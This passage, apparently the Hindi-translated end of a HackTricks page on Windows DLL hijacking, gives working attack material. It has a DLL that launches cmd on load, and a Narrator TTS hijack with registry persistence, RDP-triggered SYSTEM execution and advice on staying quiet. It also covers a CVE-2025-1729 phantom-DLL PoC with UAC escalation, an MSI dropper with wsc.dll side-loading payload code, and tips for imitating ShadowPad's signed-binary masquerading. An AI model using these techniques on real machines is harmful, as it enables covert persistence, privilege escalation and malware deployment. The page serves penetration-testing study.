#include<windows.h> #include<stdlib.h> #include<stdio.h>

void Entry (){ //Default function that is executed when the DLL is loaded system(“cmd”); }

BOOL APIENTRY DllMain (HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { switch (ul_reason_for_call){ case DLL_PROCESS_ATTACH: CreateThread(0,0, (LPTHREAD_START_ROUTINE)Entry,0,0,0); break; case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DEATCH: break; } return TRUE; }

</details>

## केस स्टडी: Narrator OneCore TTS Localization DLL Hijack (Accessibility/ATs)

Windows Narrator.exe अभी भी स्टार्ट पर एक अनुमानित, भाषा-विशिष्ट localization DLL की जाँच करता है जिसे arbitrary code execution और persistence के लिए hijacked किया जा सकता है।

Key facts
- प्रोब पथ (वर्तमान बिल्ड): `%windir%\System32\speech_onecore\engines\tts\msttsloc_onecoreenus.dll` (EN-US).
- लेगेसी पथ (पुराने बिल्ड): `%windir%\System32\speech\engine\tts\msttslocenus.dll`.
- यदि OneCore पथ पर एक लिखने योग्य हमलावर-नियंत्रित DLL मौजूद है, तो वह लोड हो जाती है और `DllMain(DLL_PROCESS_ATTACH)` निष्पादित होता है। किसी exports की आवश्यकता नहीं है।

Discovery with Procmon
- फ़िल्टर: `Process Name is Narrator.exe` and `Operation is Load Image` or `CreateFile`.
- Narrator शुरू करें और ऊपर दिए गए पथ के लोड के प्रयास को देखें।

Minimal DLL
```c
// Build as msttsloc_onecoreenus.dll and place in the OneCore TTS path
BOOL WINAPI DllMain(HINSTANCE h, DWORD r, LPVOID) {
if (r == DLL_PROCESS_ATTACH) {
// Optional OPSEC: DisableThreadLibraryCalls(h);
// Suspend/quiet Narrator main thread, then run payload
// (see PoC for implementation details)
}
return TRUE;
}

OPSEC silence

• A naive hijack will speak/highlight UI. To stay quiet, on attach enumerate Narrator threads, open the main thread (OpenThread(THREAD_SUSPEND_RESUME)) and SuspendThread it; continue in your own thread. See PoC for full code.

Trigger and persistence via Accessibility configuration

• User context (HKCU): reg add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility" /v configuration /t REG_SZ /d "Narrator" /f
• Winlogon/SYSTEM (HKLM): reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility" /v configuration /t REG_SZ /d "Narrator" /f
• उपरोक्त के साथ, Narrator शुरू करने पर प्लांट किया गया DLL लोड हो जाता है। सुरक्षित डेस्कटॉप (logon screen) पर Narrator शुरू करने के लिए CTRL+WIN+ENTER दबाएँ।

RDP-triggered SYSTEM execution (lateral movement)

• Allow classic RDP security layer: reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t REG_DWORD /d 0 /f
• RDP to the host, at the logon screen press CTRL+WIN+ENTER to launch Narrator; your DLL executes as SYSTEM on the secure desktop.
• जब RDP session बंद हो जाता है तो execution रुक जाता है—जल्दी से inject/migrate करें।

Bring Your Own Accessibility (BYOA)

• आप एक built-in Accessibility Tool (AT) registry entry (उदा., CursorIndicator) क्लोन कर सकते हैं, इसे किसी arbitrary binary/DLL की ओर इशारा करने के लिए एडिट करें, इम्पोर्ट करें, और फिर configuration को उस AT नाम पर सेट करें। यह Accessibility framework के तहत arbitrary execution को proxy करता है।

Notes

• %windir%\System32 के अंतर्गत लिखने और HKLM वैल्यूज़ बदलने के लिए admin rights की आवश्यकता होती है।
• सारी payload लॉजिक DLL_PROCESS_ATTACH में रह सकती है; कोई exports आवश्यक नहीं हैं।

Case Study: CVE-2025-1729 - Privilege Escalation Using TPQMAssistant.exe

This case demonstrates Phantom DLL Hijacking in Lenovo’s TrackPoint Quick Menu (TPQMAssistant.exe), tracked as CVE-2025-1729.

Vulnerability Details

• Component: TPQMAssistant.exe located at C:\ProgramData\Lenovo\TPQM\Assistant\.
• Scheduled Task: Lenovo\TrackPointQuickMenu\Schedule\ActivationDailyScheduleTask हर दिन सुबह 9:30 बजे लॉग-ऑन उपयोगकर्ता के context में रन होती है।
• Directory Permissions: CREATOR OWNER द्वारा writable, जिससे local users arbitrary files डाल सकते हैं।
• DLL Search Behavior: सबसे पहले उसकी working directory से hostfxr.dll लोड करने का प्रयास करता है और अगर गायब हो तो “NAME NOT FOUND” लॉग करता है, जो local directory search precedence को दर्शाता है।

Exploit Implementation

एक attacker समान डायरेक्टरी में एक malicious hostfxr.dll stub रख सकता है, missing DLL का फायदा उठाकर उपयोगकर्ता के context में code execution प्राप्त करने के लिए:

#include <windows.h>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD fdwReason, LPVOID lpReserved) {
if (fdwReason == DLL_PROCESS_ATTACH) {
// Payload: display a message box (proof-of-concept)
MessageBoxA(NULL, "DLL Hijacked!", "TPQM", MB_OK);
}
return TRUE;
}

Attack Flow

1. एक सामान्य उपयोगकर्ता के रूप में, hostfxr.dll को C:\ProgramData\Lenovo\TPQM\Assistant\ में डालें।
2. निर्धारित कार्य के वर्तमान उपयोगकर्ता संदर्भ में सुबह 9:30 बजे चलने की प्रतीक्षा करें।
3. यदि कार्य के निष्पादन के समय कोई प्रशासक लॉग इन है, तो दुर्भावनापूर्ण DLL प्रशासक के सत्र में medium integrity पर चलेगी।
4. medium integrity से SYSTEM privileges तक उन्नयन करने के लिए मानक UAC bypass तकनीकों का उपयोग करें।

केस स्टडी: MSI CustomAction Dropper + DLL Side-Loading via Signed Host (wsc_proxy.exe)

हमलावर अक्सर MSI-based droppers को DLL side-loading के साथ जोड़ते हैं ताकि वे किसी विश्वसनीय, signed process के तहत payloads निष्पादित कर सकें।

Chain overview

• उपयोगकर्ता MSI डाउनलोड करता है। GUI install के दौरान एक CustomAction चुपचाप चलता है (उदा., LaunchApplication या एक VBScript action), और embedded resources से अगले चरण का पुनर्निर्माण करता है।
• The dropper वैध, signed EXE और एक malicious DLL को समान डायरेक्टरी में लिखता है (उदा. जोड़ी: Avast-signed wsc_proxy.exe + attacker-controlled wsc.dll)।
• जब signed EXE शुरू होता है, Windows DLL search order working directory से पहले wsc.dll लोड करता है, जिससे attacker का कोड एक signed parent के तहत निष्पादित होता है (ATT&CK T1574.001)।

MSI analysis (what to look for)

• CustomAction table:
• ऐसे entries देखें जो executables या VBScript चलाते हों। संदिग्ध पैटर्न का उदाहरण: LaunchApplication जो बैकग्राउंड में एक embedded file को execute करता है।
• Orca (Microsoft Orca.exe) में, CustomAction, InstallExecuteSequence और Binary tables का निरीक्षण करें।
• MSI CAB में embedded/split payloads:
• Administrative extract: msiexec /a package.msi /qb TARGETDIR=C:\out
• Or use lessmsi: lessmsi x package.msi C:\out
• ऐसे कई छोटे fragments देखें जिन्हें जोड़कर और डिक्रिप्ट करके एक VBScript CustomAction द्वारा पुनर्निर्मित किया जाता है। सामान्य प्रवाह:

' VBScript CustomAction (high level)
' 1) Read multiple fragment files from the embedded CAB (e.g., f0.bin, f1.bin, ...)
' 2) Concatenate with ADODB.Stream or FileSystemObject
' 3) Decrypt using a hardcoded password/key
' 4) Write reconstructed PE(s) to disk (e.g., wsc_proxy.exe and wsc.dll)

wsc_proxy.exe के साथ व्यावहारिक sideloading

• इन दोनों फ़ाइलों को उसी फ़ोल्डर में रखें:
• wsc_proxy.exe: वैध साइन किया हुआ होस्ट (Avast). यह प्रोसेस अपनी डायरेक्टरी से नाम के द्वारा wsc.dll लोड करने का प्रयास करता है.
• wsc.dll: attacker DLL. अगर किसी विशिष्ट exports की आवश्यकता नहीं है तो DllMain पर्याप्त हो सकता है; अन्यथा, एक proxy DLL बनाएं और आवश्यक exports को वास्तविक लाइब्रेरी को फॉरवर्ड करते हुए DllMain में payload चलाएँ।
• एक न्यूनतम DLL payload बनाएं:

// x64: x86_64-w64-mingw32-gcc payload.c -shared -o wsc.dll
#include <windows.h>
BOOL WINAPI DllMain(HINSTANCE h, DWORD r, LPVOID) {
if (r == DLL_PROCESS_ATTACH) {
WinExec("cmd.exe /c whoami > %TEMP%\\wsc_sideload.txt", SW_HIDE);
}
return TRUE;
}

• एक्सपोर्ट आवश्यकताओं के लिए, एक प्रॉक्सी फ्रेमवर्क (उदा., DLLirant/Spartacus) का उपयोग करें ताकि एक forwarding DLL तैयार किया जा सके जो आपका payload भी execute करे।

• यह तकनीक host binary द्वारा DLL नाम समाधान (DLL name resolution) पर निर्भर करती है। अगर host absolute paths या safe loading flags (उदा., LOAD_LIBRARY_SEARCH_SYSTEM32/SetDefaultDllDirectories) का उपयोग करता है, तो hijack विफल हो सकता है।

• KnownDLLs, SxS, और forwarded exports precedence को प्रभावित कर सकते हैं और host binary तथा export सेट चुनते समय इन्हें ध्यान में रखना ज़रूरी है।

Signed triads + encrypted payloads (ShadowPad केस स्टडी)

Check Point ने बताया कि Ink Dragon कैसे ShadowPad को एक three-file triad का उपयोग करके वैध सॉफ़्टवेयर में घुलने-मिलने के लिए deploy करता है जबकि core payload डिस्क पर encrypted रहती है:

1. Signed host EXE – vendors जैसे AMD, Realtek, या NVIDIA का दुरुपयोग किया जाता है (vncutil64.exe, ApplicationLogs.exe, msedge_proxyLog.exe)। अटैकर्स executable का नाम बदलकर इसे Windows बाइनरी जैसा दिखाते हैं (उदा., conhost.exe), पर Authenticode signature वैध बनी रहती है।
2. Malicious loader DLL – EXE के पास अपेक्षित नाम के साथ drop किया जाता है (vncutil64loc.dll, atiadlxy.dll, msedge_proxyLogLOC.dll)। यह DLL आमतौर पर एक MFC binary होता है जो ScatterBrain framework से obfuscate किया गया होता है; इसका एकमात्र काम encrypted blob खोजकर उसे decrypt करना और ShadowPad को reflectively map करना होता है।
3. Encrypted payload blob – अक्सर उसी डायरेक्टरी में <name>.tmp के रूप में स्टोर किया जाता है। decrypted payload को memory-map करने के बाद loader TMP फाइल को forensic सबूत नष्ट करने के लिए delete कर देता है।

Tradecraft notes:

• Signed EXE का नाम बदलना (जबकि PE header में मूल OriginalFileName नहीं बदला गया हो) इसे Windows बाइनरी जैसा दिखने की अनुमति देता है पर vendor signature बनाए रखता है, इसलिए Ink Dragon की आदत — conhost.exe जैसा दिखने वाले बाइनरी जो वास्तव में AMD/NVIDIA utilities होते हैं — दोहराएँ।
• चूँकि executable trusted रहता है, अधिकतर allowlisting controls के लिए बस आपका malicious DLL उसके साथ होना ही काफी होता है। loader DLL को कस्टमाइज़ करने पर ध्यान दें; signed parent आमतौर पर बिना बदले चल सकता है।
• ShadowPad का decryptor उम्मीद करता है कि TMP blob loader के पास रहे और writable हो ताकि mapping के बाद वह फाइल को zero कर सके। payload load होने तक directory writable रखें; एक बार memory में रहने पर TMP फाइल सुरक्षित रूप से delete की जा सकती है OPSEC के लिए।

संदर्भ

• CVE-2025-1729 - Privilege Escalation Using TPQMAssistant.exe
• Microsoft Store - TPQM Assistant UWP
• https://medium.com/@pranaybafna/tcapt-dll-hijacking-888d181ede8e
• https://cocomelonc.github.io/pentest/2021/09/24/dll-hijacking-1.html
• Check Point Research – Nimbus Manticore Deploys New Malware Targeting Europe
• TrustedSec – Hack-cessibility: When DLL Hijacks Meet Windows Helpers
• PoC – api0cradle/Narrator-dll
• Sysinternals Process Monitor
• Unit 42 – Digital Doppelgangers: Anatomy of Evolving Impersonation Campaigns Distributing Gh0st RAT
• Check Point Research – Inside Ink Dragon: Revealing the Relay Network and Inner Workings of a Stealthy Offensive Operation

Tip

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE) Azure हैकिंग सीखें और अभ्यास करें: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks का समर्थन करें

• सदस्यता योजनाओं की जांच करें!
• हमारे 💬 Discord समूह या टेलीग्राम समूह में शामिल हों या हमें Twitter 🐦 @hacktricks_live** पर फॉलो करें।**
• हैकिंग ट्रिक्स साझा करें और HackTricks और HackTricks Cloud गिटहब रिपोजिटरी में PRs सबमिट करें।